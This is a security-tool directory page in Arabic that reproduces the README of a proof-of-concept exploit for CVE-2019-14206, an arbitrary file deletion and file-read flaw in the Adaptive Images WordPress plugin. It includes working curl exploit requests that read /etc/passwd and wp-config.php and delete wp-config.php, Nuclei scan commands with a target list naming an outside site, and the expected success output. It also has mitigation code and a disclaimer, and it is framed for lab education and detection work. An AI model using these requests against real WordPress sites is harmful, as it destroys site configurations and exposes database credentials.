Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-14206-poc — استغلال إثبات المفهوم لـ CVE-2019-14206، يوضح حذف ملفات عشوائي في إضافة Adaptive Images لووردبريس. يتضمن مختبر Docker، قالب Nuclei، ونصوص اختبار يدوية للتعليم والتحقق الأمني. | Kitploit
أدوات/GitHubGitHub/developerfred/cve-2019-14206-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

استغلال إثبات المفهوم لـ CVE-2019-14206، يوضح حذف ملفات عشوائي في إضافة Adaptive Images لووردبريس. يتضمن مختبر Docker، قالب Nuclei، ونصوص اختبار يدوية للتعليم والتحقق الأمني.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

CVE-2019-14206 - حذف الملفات التعسفي لـ Adaptive Images لووردبريس

📋 الفهرس

  1. حول الثغرة
  2. المتطلبات الأساسية
  3. التثبيت
  4. طرق الاختبار
    • اختبار سريع
    • اختبار كامل باستخدام Docker
    • اختبار باستخدام Nuclei
    • اختبار يدوي
  5. تفسير النتائج
  6. التنظيف
  7. استكشاف الأخطاء وإصلاحها
  8. التخفيف
  9. إخلاء مسؤولية قانوني

🎯 حول الثغرة

CVE-ID: CVE-2019-14206
الخطورة: عالية (CVSS 6.5)
الإضافة المتأثرة: Adaptive Images لووردبريس
الإصدارات المتأثرة: < 0.6.67

ماذا تسمح هذه الثغرة؟

تسمح هذه الثغرة لمهاجم عن بعد غير مصادق بحذف ملفات تعسفية على خادم ووردبريس من خلال استغلال إضافة Adaptive Images.

التأثير الفعلي:

  • ❌ حذف wp-config.php مما يسبب انهياراً كاملاً للموقع
  • ❌ كشف بيانات اعتماد قاعدة البيانات عبر LFI
  • ⚠️ سلسلة هجوم تؤدي إلى RCE (تنفيذ أوامر عن بعد)
  • 🔴 اختراق كامل لموقع ووردبريس

السبب الجذري:

root@kitploit:~
// الإضافة تستخدم إدخال المستخدم دون تطهير
$settings = $_REQUEST['adaptive-images-settings'];

// بناء مسار الملف بمعلمات يتحكم بها المهاجم
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// حذف ملف تعسفي
unlink($cache_file);

💻 المتطلبات الأساسية

المتطلبات الدنيا:

  • نظام التشغيل: macOS أو Linux أو Windows
  • Nuclei: الإصدار 3.0 أو أعلى (تثبيت)
  • Bash: الإصدار 4.0 أو أعلى
  • curl: للاختبارات اليدوية
  • PHP: الإصدار 7.0+ (اختياري، للاختبار مع الخادم المدمج)

التحقق من المتطلبات الأساسية:

root@kitploit:~
# التحقق من Nuclei
nuclei --version

# التحقق من Bash
bash --version

# التحقق من curl
curl --version

# التحقق من PHP (اختياري)
php --version 2>/dev/null || echo "PHP غير متوفر (اختياري)"

🚀 التثبيت

الخطوة 1: استنساخ أو تحميل الملفات

root@kitploit:~
# إذا كنت في دليل nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# أو تحميل الملفات المطلوبة
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

الخطوة 2: التحقق من هيكل الملفات

root@kitploit:~
# التحقق من وجود الملفات
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

الخطوة 3: جعل البرامج النصية قابلة للتنفيذ

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 طرق الاختبار

1. اختبار سريع ⏱️ دقيقتان

قم بتنفيذ العرض التوضيحي الكامل الذي يحاكي الاستغلال بأكمله:

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

ما يحدث:

  • إنشاء بيئة اختبار كاملة
  • محاكاة الثغرة
  • عرض حذف ملف
  • التحقق من صحة قالب Nuclei

الإخراج المتوقع:

root@kitploit:~
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. اختبار كامل باستخدام Docker 🐳 10 دقائق

الخطوة 1: بدء بيئة Docker

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# إذا كان Docker يعمل
docker-compose up -d

# إذا كان Docker لا يعمل، استخدم المحاكي
./docker-test-full.sh

الخطوة 2: الوصول إلى ووردبريس

root@kitploit:~
# ستكون البيئة متاحة على
# http://localhost:8888

الخطوة 3: التحقق من الإضافة الضعيفة

root@kitploit:~
# التحقق من وجود السكريبت الضعيف
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

الخطوة 4: تنفيذ الاختبارات

root@kitploit:~
# اختبار LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# اختبار حذف الملف
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# التحقق من حذف wp-config.php
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. اختبار باستخدام Nuclei 🎯 5 دقائق

الخطوة 1: تحضير قائمة الأهداف

root@kitploit:~
# إنشاء ملف الأهداف
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

الخطوة 2: تشغيل المسح

root@kitploit:~
# مسح أساسي
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# مسح مفصّل
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# مسح مع التصحيح (إلزامي لـ bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# حفظ النتائج
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

الخطوة 3: تفسير النتائج

root@kitploit:~
# عرض النتائج
cat results.txt

# النتائج الإيجابية ستكون:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. اختبار يدوي 🔧 10 دقائق

الخطوة 1: بدء خادم PHP

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

الخطوة 2: اختبار LFI (قراءة الملفات)

root@kitploit:~
# محاولة قراءة /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# محاولة قراءة wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

النتيجة المتوقعة (LFI):

root@kitploit:~
=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

الخطوة 3: اختبار حذف الملفات

root@kitploit:~
# التحقق من وجود wp-config.php قبل
ls -la wp-config.php

# تنفيذ الاستغلال
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# التحقق من حذف wp-config.php بعد
ls -la wp-config.php

النتيجة المتوقعة (حذف الملف):

root@kitploit:~
[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 تفسير النتائج

نتيجة إيجابية (ضعيفة):

root@kitploit:~
[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

نتيجة سلبية (غير ضعيفة):

root@kitploit:~
[N/A] No results found

أسباب محتملة للخطأ السلبي الكاذب:

  • ✅ الإضافة غير مثبتة
  • ✅ الإضافة محدثة (الإصدار >= 0.6.67)
  • ✅ WAF يحجب الطلبات
  • ✅ الخادم لا يستجيب في المسارات المتوقعة

🧹 التنظيف

تنظيف بيئة الاختبار:

root@kitploit:~
# إزالة بيئة Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# إزالة ملفات الاختبار
rm -rf docker-test/
rm -f targets.txt results.txt

# استعادة wp-config.php إذا تم حذفه
cat > wp-config.php << 'EOF'
<?php
// ملف مستعاد
define('DB_NAME', 'wordpress');
EOF

تنظيف Nuclei:

root@kitploit:~
# إزالة نتائج المسح
rm -f results.txt

# مسح الذاكرة المؤقتة (اختياري)
nuclei -rm-cache

🔧 استكشاف الأخطاء وإصلاحها

المشكلة 1: لم يتم العثور على Nuclei

root@kitploit:~
# تثبيت Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# أو تحميل الملف الثنائي
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.0.0/nuclei-linux-amd64.zip
unzip nuclei-linux-amd64.zip
chmod +x nuclei
sudo mv nuclei /usr/local/bin/

المشكلة 2: القالب لا يتم تحميله

root@kitploit:~
# التحقق من وجود الملف
ls -la http/cves/2019/CVE-2019-14206.yaml

# التحقق من بناء جملة YAML
python3 -c "import yaml; yaml.safe_load(open('http/cves/2019/CVE-2019-14206.yaml'))"

# استخدام المسار المطلق
nuclei -t /Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml -u http://target

المشكلة 3: خادم PHP لا يعمل

root@kitploit:~
# التحقق من المنفذ
lsof -i :8888

# استخدام منفذ مختلف
php -S localhost:9999

# التحقق من تثبيت PHP
which php
php --version

المشكلة 4: Docker لا يعمل

root@kitploit:~
# التحقق من حالة Docker
docker ps

# بدء Docker
# على macOS: افتح Docker Desktop
# على Linux: sudo systemctl start docker

# استخدام وضع المحاكي (يعمل بدون Docker)
./docker-test-full.sh

🛡️ التخفيف

حماية فورية:

  1. تحديث الإضافة:

    root@kitploit:~
    لوحة تحكم ووردبريس > إضافات > تحديث Adaptive Images
    
  2. الإصدار الآمن: >= 0.6.67

  3. إزالة الإضافة الضعيفة:

    root@kitploit:~
    rm -rf wp-content/plugins/adaptive-images/
    

حماية في الكود (للمطورين):

root@kitploit:~
// ✅ كود آمن (مثال للتصحيح)
function adaptive_images_script_get_settings() {
    // تطهير الإدخال
    $allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
    $settings = [];
    
    foreach ($allowed_keys as $key) {
        if (isset($_REQUEST['adaptive-images-settings'][$key])) {
            $settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
        }
    }
    
    return $settings;
}

function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
    // التحقق من صحة المسارات
    $allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
    $cache_dir = basename(dirname($cache_file));
    
    if (!in_array($cache_dir, $allowed_cache_dirs)) {
        return false; // رفض المسارات غير الصالحة
    }
    
    // استخدام مسارات مطلقة تم التحقق منها
    $cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
    
    if (file_exists($cache_file)) {
        unlink($cache_file);
    }
}

⚠️ إخلاء مسؤولية قانوني

شروط الاستخدام:

هذه المادة مقدمة حصرياً للأغراض التعليمية واختبار الأمان.

ما يمكنك فعله:

  • ✅ اختبار على أنظمتك التي تملكها
  • ✅ الاستخدام في بيئات المختبر
  • ✅ تعلم عن ثغرات الويب
  • ✅ المساهمة في أمان المصادر المفتوحة
  • ✅ اختبار تطبيقاتك الخاصة

ما لا يمكنك فعله:

  • ❌ اختبار أنظمة دون إذن
  • ❌ التسبب في أضرار أو انقطاعات
  • ❌ الاستخدام لأغراض خبيثة
  • ❌ بيع أو توزيع الاستغلالات
  • ❌ نشر معلومات عن أنظمة ضعيفة

المسؤولية:

المؤلف والمساهمون لا يتحملون أي مسؤولية عن أي:

  • استخدام غير صحيح لهذه المادة
  • أضرار تلحق بالأنظمة
  • فقدان بيانات
  • انقطاع خدمة
  • مشاكل قانونية

الإفصاح المسؤول:

إذا وجدت هذه الثغرة في أنظمة حقيقية:

  1. لا تستغلها أو تسبب أضراراً
  2. وثق الثغرة
  3. أبلغ المسؤول عن النظام
  4. اتبع إرشادات الإفصاح المسؤول

📚 موارد إضافية

مراجع:

  • NVD - CVE-2019-14206
  • البحث الأصلي
  • الإضافة الرسمية
  • إدخال WPScan

أدوات ذات صلة:

  • Nuclei
  • nuclei-templates
  • WPScan
  • Wordfence

🎓 الدروس المستفادة

يوضح هذا المشروع:

  1. التحقق من الإدخال: أهمية تطهير كل إدخال من المستخدم
  2. عبور المسار: كيف يمكن التلاعب بمسارات الملفات
  3. عمليات الملفات: مخاطر دوال مثل unlink() بإدخال المستخدم
  4. أمان الإضافات: ثغرات شائعة في إضافات ووردبريس
  5. تحليل CVE: كيفية تحليل وإعادة إنتاج الثغرات
  6. تطوير الكشف: كيفية إنشاء قوالب كشف فعالة

📝 سجل التغييرات

الإصدار 1.0.0 (2026-01-04)

  • ✅ إنشاء قالب Nuclei
  • ✅ بيئة PoC كاملة
  • ✅ توثيق كامل
  • ✅ التحقق من صحة نصوص الاختبار
  • ✅ عرض توضيحي وظيفي

🤝 المساهمة

المساهمات مرحب بها! للمساهمة:

  1. Fork المستودع
  2. إنشاء فرع (git checkout -b feature/improvement)
  3. Commit تغييراتك (git commit -am 'Add improvement')
  4. Push إلى الفرع (git push origin feature/improvement)
  5. إنشاء طلب سحب (Pull Request)

📧 الدعم

للاستفسارات أو المشكلات:

  1. تحقق من قسم استكشاف الأخطاء وإصلاحها
  2. تحقق من قضايا المستودع
  3. توثيق المشكلة مع:
    • نظام التشغيل
    • إصدار Nuclei
    • إصدار PHP (إن أمكن)
    • رسالة الخطأ كاملة
    • خطوات إعادة الإنتاج

🎉 شكراً لاستخدامك هذه المادة الاختبارية!

تذكر: مع القوة العظيمة تأتي مسؤولية عظيمة. استخدم هذه المعرفة لجعل الإنترنت أكثر أماناً، وليس أكثر ضعفاً.


تاريخ الإنشاء: 4 يناير 2026
الإصدار: 1.0.0
الحالة: ✅ جاهز للاستخدام في الإنتاج

تنزيل الأداة